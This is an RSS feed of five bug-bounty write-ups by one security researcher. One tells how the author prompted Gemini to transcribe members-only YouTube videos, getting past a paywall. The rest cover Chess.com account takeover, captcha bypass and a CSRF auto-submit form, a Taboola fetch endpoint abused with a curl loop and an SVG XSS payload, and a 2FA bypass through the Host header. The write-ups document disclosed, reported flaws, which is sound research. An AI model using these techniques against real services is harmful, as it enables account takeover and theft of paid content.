<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Seqrity on Medium]]></title>
        <description><![CDATA[Stories by Seqrity on Medium]]></description>
        <link>https://medium.com/@seqrity?source=rss-ea4490f8e1f5------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*wMk8SwutLp89HGvVoAmayQ.jpeg</url>
            <title>Stories by Seqrity on Medium</title>
            <link>https://medium.com/@seqrity?source=rss-ea4490f8e1f5------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Fri, 15 May 2026 20:17:21 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@seqrity/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Access to members-only YouTube video content]]></title>
            <link>https://infosecwriteups.com/access-to-members-only-youtube-video-content-6f5d951da209?source=rss-ea4490f8e1f5------2</link>
            <guid isPermaLink="false">https://medium.com/p/6f5d951da209</guid>
            <category><![CDATA[bug-bounty-writeup]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[ai-security]]></category>
            <dc:creator><![CDATA[Seqrity]]></dc:creator>
            <pubDate>Wed, 13 May 2026 19:57:46 GMT</pubDate>
            <atom:updated>2026-05-15T05:32:08.393Z</atom:updated>
            <content:encoded><![CDATA[<p>I was browsing the NahamSec YouTube channel when I noticed some members-only videos. Usually, you need to be a paid member of a channel to access them, but as a bug hunter, I tried to access them without paying. One approach that came to mind was using Gemini. Since Gemini is another Google product, I thought it might have deeper access to YouTube videos.</p><p>I tested this using <a href="https://aistudio.google.com">Google AI Studio</a>.</p><p><strong>My first prompt was:</strong></p><pre>Print all details and subtitles separately like<br>[Visual]<br>[Subtitle]<br>Print each [Visual] and [Subtitle] alongside by timestamp.<br>https://www.youtube.com/watch?v=D1QdCusWu8M</pre><p>The output was not accurate.</p><p>At that time, Gemini was on version 2.0. A week later, version 2.5 was released with a new feature: a dedicated YouTube tool that allows you to attach video links directly.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/352/1*LchyOTktkj-2j6DNt6cJiA.jpeg" /></figure><p>I tried again. Gemini 2.5 treated the links differently, and the output was exactly what I expected. It printed the subtitles and described the video frame by frame.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Nh41NaYatOf3Zqz8uG_-gw.jpeg" /></figure><p>Since the video was about developing a Caido plugin, I tried to fetch the code from a specific time using this prompt:</p><pre>print javascript code at 0m52s693ms - 0m56s333ms</pre><p><strong>The result was:</strong></p><pre>&gt; var script = document.createElement(&#39;script&#39;);<br>  script.src = &#39;https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js&#39;;<br>  script.addEventListener(&#39;load&#39;, function() {<br>      window.getCookie = function(name) {<br>          var match = document.cookie.match(new RegExp(&#39;(^| )&#39; + name + &#39;=([^;]+)&#39;));<br>          if (match) return match[2];</pre><p>I reported this bug to the Google Bug Bounty program and was awarded $1,337.</p><p><strong>Original report:</strong></p><p><a href="https://bughunters.google.com/reports/vrp/V5pPrth1n">Access to members only YouTube video content | Google Bug Hunters</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=6f5d951da209" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/access-to-members-only-youtube-video-content-6f5d951da209">Access to members-only YouTube video content</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[10 golden minutes for taking over a Chess.com account]]></title>
            <link>https://infosecwriteups.com/10-golden-minutes-for-taking-over-a-chess-com-account-56e73f7c5f0d?source=rss-ea4490f8e1f5------2</link>
            <guid isPermaLink="false">https://medium.com/p/56e73f7c5f0d</guid>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Seqrity]]></dc:creator>
            <pubDate>Tue, 14 Sep 2021 16:32:28 GMT</pubDate>
            <atom:updated>2021-09-16T04:58:06.296Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/668/1*geAvv8DDvizjPnekoKIUew.png" /><figcaption>Chess.com logo</figcaption></figure><p>Hi folks, this is the second write-up about finding bugs on Chess.com. You can find the first one <a href="https://infosecwriteups.com/finding-bugs-on-chess-com-739a71fbdb31">here</a>.<br>Chess.com is the most famous website for playing &amp; learning chess.</p><p>You can log in to the site by two parameters, the first one is your email and the second one is your username. This story learn us to check all features and look for anomalies on each feature. <br>I’ve found that if you change your password, it changes just for one parameter (email) and after changing the password you can’t log in by your username and new password. In fact, the changes apply just to email and new password changes after 10 minutes on the username. So if your password leaks and you change your password, someone who has your password can log in after changing your password by username and old password. The process of update query for changing the password is like the following image:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*l8tJn7-8cL8-SmcH3de70A.png" /><figcaption>This is schematic and imaginary for a better understanding.</figcaption></figure><p>After sending this bug to Chess.com, they said this delay was for replication and was temporary. I checked it tomorrow and the bug existed!<br>Finally, the report scored at 3.5 based on <a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N">CVSS</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/180/1*uf6vUq8J2Y3mdlqBa6Olpg.gif" /></figure><p>In more investigating, I find that after 10 minutes session won’t expire! Checked the change password form and there wasn’t any rate limit! BOOM!!!</p><p>By using burp intruder ran a brute force attack and found the new password. I escalated the bug to full account takeover.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9BYrp27sPV3YVprIKlBIqg.png" /><figcaption>Burp intruder</figcaption></figure><p>The report scored at 4.4 based on <a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N">CVSS</a> and they increased bounty to $400.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/346/1*BF6DSTrDp-vVWwf36FNFew.gif" /></figure><p>You can find me on Twitter by the following link:</p><p><a href="https://twitter.com/seqrity9">https://twitter.com/seqrity9</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=56e73f7c5f0d" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/10-golden-minutes-for-taking-over-a-chess-com-account-56e73f7c5f0d">10 golden minutes for taking over a Chess.com account</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Finding bugs on Chess.com]]></title>
            <link>https://infosecwriteups.com/finding-bugs-on-chess-com-739a71fbdb31?source=rss-ea4490f8e1f5------2</link>
            <guid isPermaLink="false">https://medium.com/p/739a71fbdb31</guid>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[hunting]]></category>
            <category><![CDATA[chesscom]]></category>
            <dc:creator><![CDATA[Seqrity]]></dc:creator>
            <pubDate>Thu, 07 Jan 2021 07:55:41 GMT</pubDate>
            <atom:updated>2021-02-19T06:46:03.225Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/700/1*kQ8JhEGEFBQ-DseXpH0H5g.png" /><figcaption>Finding vulnerabilities on the Chess.com</figcaption></figure><p>Hi hunters and folks, I’m a chess lover and almost use Chess.com everyday but I’m not pro 😉</p><p>Chess.com is the #1 online chess website and has an <a href="https://www.chess.com/news/view/chess-com-bug-bounty-policy"><strong>internal bug bounty program</strong></a><strong> </strong>but I think they should more clarify some points in their policy and update it every month. It would be better if they use bug bounty platforms like <a href="https://www.hackerone.com/">HackerOne</a>.</p><p>They’re really friendly in communication but stricter than H1 triagers for accepting bugs and pay bounty.</p><h3>Don’t rely on one tool</h3><p>The hunting story started one day on login page, Chess.com redirected me to another page for solving Cloudflare hCaptcha. I think, It was for using my VPS IP on login page by proxy and Cloudflare had placed my IP in graylist.<br>I’ve used <a href="https://addons.mozilla.org/en-US/firefox/addon/http-header-live/">HTTP Header Live</a> sometimes and in this case use it too. After login the server will redirect user to the following link for solving Captcha:</p><blockquote><a href="https://www.chess.com/login_check"><strong>https://www.chess.com/login_check</strong></a></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mDlCOKBfSvg2Wu1Zy6Zbzg.png" /><figcaption><a href="https://www.chess.com/login_check"><strong>https://www.chess.com/login_check</strong></a></figcaption></figure><p>The <strong>HTTP Header Live </strong>intercepts requests like Burp. If you click on a request a window will appear on screen and you can change or resend request.</p><p>In this case request was POST and my username and password was in body. I’ve just resend it and the following page loaded!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nj5q9WozFQRcVcUHMSfcDA.png" /><figcaption>Send POST request via <strong>HTTP Header Live</strong></figcaption></figure><p>After clicking on <strong>Home </strong>button the hCAPTCHA bypasses and you can login without solving the captcha because hCAPTCHA has a misconfiguration on the server. You can’t reproduce these steps by Burp because <strong>HTTP Header Live </strong>uses blob URL(Look at address bar in the image above). <br><strong>So don’t rely on one tool!!!</strong></p><h3><strong>Test all functions in applications</strong></h3><p>There are two methods for loging in to Chess.com. The first one is via username and the second one is via email. If you enter wrong password more than 10 times you have to solve a captcha. But what’s the bug?</p><p>In fact there was a misconfiguration on login page via email which after entering 10 wrong attempts login the captcha doesn’t appear and an attacker can run brute-force attack for each user leads to lock victim’s account.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/431/1*lgwB4fbsU9PbC-0dYAENlQ.png" /><figcaption>Login page</figcaption></figure><p>If the user uses mobile app will see the following error:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/715/1*aXeVC-SpaapTBxQBMouxtA.jpeg" /></figure><p>The user should login on the Chess.com website and solve the Captcha for unlocking the account.</p><p><strong>So as a bug hunter, you should test all functions on the application.</strong></p><h3>Checking CSRF’s deeply</h3><p>There is a function in Chess.com that you can login via Google,Facebook,… accounts but there is a problem there.</p><p>You can disconnect from those accounts from the setting menu and the bug still stays there.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BVjwdQ_toAiIC_fUk8038w.png" /><figcaption>Connected Accounts</figcaption></figure><p>When the user clicks on disconnect button, a POST request sends to server like the following image:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pnRf8Xqlpfh3fIL9W_ot0g.png" /><figcaption>POST request</figcaption></figure><p>But after sending this POST request nothing happens!</p><p>It seems everything is correct! These kind of requests should send a POST request with a token. Logic is true but answer is in the next request.</p><p>In fact, POST request does nothing and next GET request disconnect the user from Google account.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*UZCbmwVV9IrnpGfn6no8Vw.png" /><figcaption>GET request</figcaption></figure><p>So, any attacker can send just a link for victims then the victims will disconnect from their account or use the following code for hosting CSRF file:</p><pre>&lt;html&gt;<br>&lt;body&gt;</pre><pre>&lt;form action=&quot;https://www.chess.com/settings/google/disconnect&quot;&gt;&lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;<br>&lt;/form&gt;</pre><pre>&lt;script&gt;<br>document.forms[0].submit();<br>&lt;/script&gt;</pre><pre>&lt;/body&gt;<br>&lt;/html&gt;</pre><p><strong>So think out of the box and review all the requests. Maybe happen a weird thing that you don’t expect it.</strong></p><p>You can find me on twitter by the following link:</p><p><a href="https://twitter.com/seqrity9">https://twitter.com/seqrity9</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=739a71fbdb31" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/finding-bugs-on-chess-com-739a71fbdb31">Finding bugs on Chess.com</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[A juicy endpoint on the Taboola leads to reveal internal IPs and XSS]]></title>
            <link>https://infosecwriteups.com/a-juicy-endpoint-on-the-taboola-leads-to-reveal-internal-ips-and-xss-d136364a6fb?source=rss-ea4490f8e1f5------2</link>
            <guid isPermaLink="false">https://medium.com/p/d136364a6fb</guid>
            <category><![CDATA[redirect]]></category>
            <category><![CDATA[xs]]></category>
            <category><![CDATA[ddos]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[internal-ip]]></category>
            <dc:creator><![CDATA[Seqrity]]></dc:creator>
            <pubDate>Thu, 03 Sep 2020 11:55:14 GMT</pubDate>
            <atom:updated>2020-11-21T16:23:30.226Z</atom:updated>
            <content:encoded><![CDATA[<p>I usually read news about security everyday, One of these websites is <a href="https://www.zdnet.com/">ZDNet</a>. There is an space in the bottom of the page for recommending ads by the Taboola.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/853/1*cymRm0K5hh3_3oYzqDIjvA.png" /></figure><p>As a security lover, I always take a look at everywhere I can 😁</p><p>Just right-click on ads and find a juicy endpoint by <strong>Inspect Element</strong>. An endpoint fetch pictures from the Taboola CDN.</p><pre><a href="https://images.taboola.com/taboola/image/fetch/">https://images.taboola.com/taboola/image/fetch/</a></pre><p>If you insert an external URL image after this endpoint, the Taboola server will process and show the picture. The Taboola won’t check that image is whether from it’s CDN or not!</p><p>What happen If I send a request from Taboola by this endpoint to my server? So I did it and found the Taboola internal IPs.</p><p>I’ve prepared my server by the following command for listening on port 8000</p><pre>python -m SimpleHTTPServer 8000</pre><p>And from my PC send multiple requests to server by the following code:</p><pre>for number in {1..100}<br>do curl -i <a href="https://images.taboola.com/taboola/image/fetch/http://{target">https://images.taboola.com/taboola/image/fetch/http://S</a>ERVER_IP:8000/$number<br>done</pre><p>And responses were amazing!!!</p><p>The Taboola uses Fastly CDN and whenever you ping <strong>images.taboola.com</strong>, you will receive the following response:</p><pre>ping images.taboola.com<br>PING tls13.taboola.map.fastly.net (151.101.193.44) 56(84) bytes of data.</pre><p>But I found internal IPs from Amazon!!!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tteSLV9OfuSsNkk0RuajWw.png" /></figure><p>So, With this juicy endpoint you can run DOS Attack on behalf the Taboola servers.</p><p>In addition, these servers had open ports on 22 and 80 and there were two CVEs on one of them.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/772/1*sbPavcKbOwvnWq4LlJpH-g.png" /></figure><p>Maybe you’ve thought that this endpoint processes images and maybe accepts SVG images 😉</p><p>Find an SVG image and open it by a text editor. Add the following code and upload it on the Internet.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/871/1*bsZiIzY2WqnCD58yhJrnoQ.png" /></figure><p>Finally, we have this link:</p><pre><a href="https://images.taboola.com/taboola/image/fetch/https://www.linkpicture.com/q/dog.svg">https://images.taboola.com/taboola/image/fetch/<strong>https://www.linkpicture.com/q/dog.svg</strong></a></pre><p>Unfortunately, the endpoint doesn’t process SVG images properly and browser will download the file. But if you use Chrome or IE and click on downloaded image for opening the image, you will redirect to <strong>evil.com</strong></p><p>You can change payload in SVG file to the following code for executing XSS:</p><pre>onload=&#39;alert(&quot;XSS&quot;)&#39;</pre><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2FLid1BykURtE%3Ffeature%3Doembed&amp;display_name=YouTube&amp;url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DLid1BykURtE&amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FLid1BykURtE%2Fhqdefault.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=youtube" width="854" height="480" frameborder="0" scrolling="no"><a href="https://medium.com/media/fb1379d8ed4fa65edb1a3747e4b4a848/href">https://medium.com/media/fb1379d8ed4fa65edb1a3747e4b4a848/href</a></iframe><p>I’ve found these bugs on the Taboola and sent email to the support team on March 2020. They didn’t respond to me until now!</p><p>My Twitter: <a href="https://twitter.com/seqrity9">https://twitter.com/seqrity9</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d136364a6fb" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/a-juicy-endpoint-on-the-taboola-leads-to-reveal-internal-ips-and-xss-d136364a6fb">A juicy endpoint on the Taboola leads to reveal internal IPs and XSS</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Bypass 2FA like a Boss]]></title>
            <link>https://infosecwriteups.com/bypass-2fa-like-a-boss-378787707ba?source=rss-ea4490f8e1f5------2</link>
            <guid isPermaLink="false">https://medium.com/p/378787707ba</guid>
            <category><![CDATA[infosec]]></category>
            <category><![CDATA[bug-bounty]]></category>
            <category><![CDATA[writeup]]></category>
            <category><![CDATA[security]]></category>
            <dc:creator><![CDATA[Seqrity]]></dc:creator>
            <pubDate>Sat, 20 Jun 2020 09:01:58 GMT</pubDate>
            <atom:updated>2025-04-18T08:05:49.151Z</atom:updated>
            <content:encoded><![CDATA[<p>This write-up is about a public program, but the disclosure policy is enabled on this program, so we assume the domain is: domain.com</p><p>In the recon process, I’ve found that two websites are the same :</p><p><a href="http://www.domain.com">www.domain.com</a><br>beta.domain.com</p><p>2FA was enabled on <a href="http://www.domain.com">www.domain.com</a>, and when you create an account on this domain, you can log in on beta.domain.com without entering the 2FA code.</p><p>By default, the 2FA was disabled. So, I‘ve decided to try bypassing 2FA and enabling it on <a href="http://www.domain.com.">www.domain.com</a>. After entering the username and password, you should enter 6 characters (digits and chars), and after 5 minutes, the code will be expired. Therefore, brute force doesn’t work here.</p><p>Open Burp and intercept request after entering a password, and change Host header to beta.domain.com</p><p>Enter 000000 in twofactorcode field</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/721/1*0EA0HHwjXglXZazwMTeItQ.png" /></figure><p>And forward request, BOOOM.</p><p>I successfully logged in to <a href="http://www.domain.com.">www.domain.com</a> without entering the correct code.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/346/1*BF6DSTrDp-vVWwf36FNFew.gif" /></figure><p>Report: 14 May 2020</p><p>Fixed: 15 May 2020</p><p>First Response: 19 May 2020</p><p>Bounty: They didn’t pay bounty and said our developers fix that before reviewing your report!!!</p><p>My Twitter: <a href="https://twitter.com/seqrity9">https://twitter.com/seqrity9</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=378787707ba" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/bypass-2fa-like-a-boss-378787707ba">Bypass 2FA like a Boss</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
    </channel>
</rss>